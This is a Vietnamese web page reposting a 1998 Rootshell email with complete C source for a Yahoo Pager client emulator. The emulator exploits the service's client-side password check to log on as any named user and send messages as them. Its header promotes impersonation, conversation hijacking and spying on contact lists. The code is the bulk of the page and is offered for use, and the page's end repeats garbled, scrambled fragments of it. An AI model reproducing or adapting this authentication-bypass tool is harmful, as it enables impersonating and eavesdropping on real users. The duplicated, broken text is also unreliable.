Hack Yahoo bằng C

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Hack Yahoo bằng C

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Hack Yahoo bằng C

Hack Yahoo bằng C :trang này đã được đọc lần [ http://www.rootshell.com/ ]From douglas@min.net Sun Aug 2 18:48:44 1998Date: Sun, 2 Aug 1998 20:56:16 -0400 (EDT)From: D. Winslow <douglas@min.net>To: www-request@rootshell.comSubject: Yahoo Pager insecurity/*Yahoo Pager Client Emulator Thing - yp.cDouglas Winslow <douglas@min.net>Sun Aug 2 20:55:11 EDT 1998Known to compile on Linux 2.0, FreeBSD 2.2, and BSDi 3.0.hi to aap bdc drw jfn jrc mm mcd [cejn]b #cz and rootshellYahoo Pager seems to trust the client-side to do passwordverification. That's just plain sad. All you need tosupply is a username to bump people off, spy on contactlists, hijack conversations, impersonate people, etc.I know some of this is sleazy code I apologise, as itwas written more out of haste than thought. Obviously,don't expect this to work after they've patched theirserver-side. Here are a few notes to get you started:Contact list update format:nick(cur_mode,session_id?,ip_addr,is_on,is_off?,direct_conn?)Example: "monica(2,B37F6832,5AF089C6,1,0,0)"Multiple contact list updates begin with "x,".Example: "3,monica( .),bill( .),janetreno( .)"The rest of the server responses are rather straightforward;I'll leave those up to you. ;>*/#include <stdio.h>#include <netdb.h>#include <fcntl.h>#include <sys/socket.h>#include <netinet/in.h>#define YP_SERV "cs3.yahoo.com"#define YP_PORT 5050char xmt[1128], buffer[38];int flag, k, s; void yparse();void main(int argc, char *argv[]){char mesg[1024], tmp[38], to[38];int i, n, out, port;struct sockaddr_in serv_addr;struct hostent *server;if (argc > 1) strncpy(tmp, argv[1], 36);else{printf("Log on as? ");fgets(tmp, 36, stdin);tmp[strlen(tmp) - 1] = 0;}if (!strlen(tmp)) exit(1);memset(xmt, 0, sizeof(xmt));strcpy(xmt, "YPNS1.1");xmt[8] = 104;xmt[9] = 3;xmt[12] = 1; /* Service: Logon */for (i=32; i < strlen(tmp) + 32; i++){xmt[i] = tmp[i - 32];xmt[i + 36] = tmp[i - 32];xmt[i + 72] = tmp[i - 32];}port = YP_PORT;server = gethostbyname(YP_SERV);if (!server){fprintf(stderr, "** Can't resolve \"%s\"\n", YP_SERV);exit(1);}s = socket(AF_INET, SOCK_STREAM, 0);bzero(&serv_addr, sizeof(serv_addr));serv_addr.sin_family = AF_INET;bcopy(server->h_addr, &serv_addr.sin_addr.s_addr,server->h_length);serv_addr.sin_port = htons(port);if (connect(s, &serv_addr, sizeof(serv_addr)) < 0) {perror("** Unable to connect to remote host");exit(1);}printf("** Attempting to log on as \"%s\"\n", tmp); out = write(s, xmt, sizeof(xmt));printf("** Sent %i bytes .\n", out);flag = fcntl(s, F_GETFL, 0);flag |= O_NONBLOCK;fcntl(s, F_SETFL, flag);printf("** Type \"msg\" to send an Instant Message.\n");while(1){memset(buffer, 0, sizeof(buffer));memset(to, 0, sizeof(to));flag = fcntl(0, F_GETFL, 0);flag |= O_NONBLOCK;fcntl(0, F_SETFL, flag);fgets(to, 36, stdin);to[strlen(to) - 1] = 0;if (!strcmp(to, "msg")){flag = fcntl(0, F_GETFL, 0);flag -= O_NONBLOCK;fcntl(0, F_SETFL, flag);memset(to, 0, sizeof(to));printf(" To: ");fgets(to, 36, stdin);to[strlen(to) - 1] = 0;if (strlen(to)){memset(mesg, 0, sizeof(mesg));printf("Msg: ");fgets(mesg, 1024, stdin);mesg[strlen(mesg) - 1] = 0;memset(xmt, 0, sizeof(xmt));strcpy(xmt, "YPNS1.1");xmt[8] = 104;xmt[9] = 4;xmt[12] = 6; /* Service: Message */for (i=32; i < strlen(tmp) + 32; i++){xmt[i] = tmp[i - 32];xmt[i + 36] = tmp[i - 32];}for (i=104; i < strlen(to) + 104; i++)xmt[i] = to[i - 104];k = strlen(to) + 104;xmt[k] = 44;k++;for (i=0; i < strlen(mesg); i++)xmt[i + k] = mesg[i];out = write(s, xmt, sizeof(xmt));printf("** Sent %i bytes\n", out);}}if (!strcmp(to, "quit")) exit(0);if (recv(s, buffer, 1, 0) > 0)if (buffer[0] == 89) yparse();else sleep(1);}}void yparse(){char tmp[255], nick1[38], nick2[38], content[4096];int len, service;recv(s, buffer, 31, 0);printf("\nServer Version: Y%s\n", buffer);sprintf(tmp, "%i", buffer[7]);len = atoi(tmp);if (len < 0) len += 255;service = buffer[11];printf(" Packet Length: %i\n", len);printf(" Service Type: (%i) ", service);recv(s, buffer, 36, 0);strncpy(nick1, buffer, 36);recv(s, buffer, 36, 0);strncpy(nick2, buffer, 36);recv(s, buffer, len, 0);memset(content, 0, sizeof(content));strncpy(content, buffer, len);if (service == 1)if (content[0] == 69) printf("Bad username; Goodbye");else printf("User logged on");if (service == 2)if (strlen(content)) printf("User logged off");else printf("Duplicate logins; Goodbye");if (service == 3) printf("User wandered away");if (service == 4) printf("User came back");if (service == 6) printf("Instant Message");if (service == 11) printf("You've got mail");if (service == 15) printf("Added you to their contact list");printf("\n Actual User: %s\n", nick1);printf(" Active User: %s\n", nick2);printf(" Content: %s\n", content);} . 36);recv(s, buffer, 36, 0);strncpy(nick2, buffer, 36);recv(s, buffer, len, 0);memset(content, 0, sizeof(content));strncpy(content, buffer, len);if (service. 1998Known to compile on Linux 2.0, FreeBSD 2.2, and BSDi 3.0.hi to aap bdc drw jfn jrc mm mcd [cejn]b #cz and rootshellYahoo Pager seems to trust the client-side

Ngày đăng: 02/11/2012, 14:18

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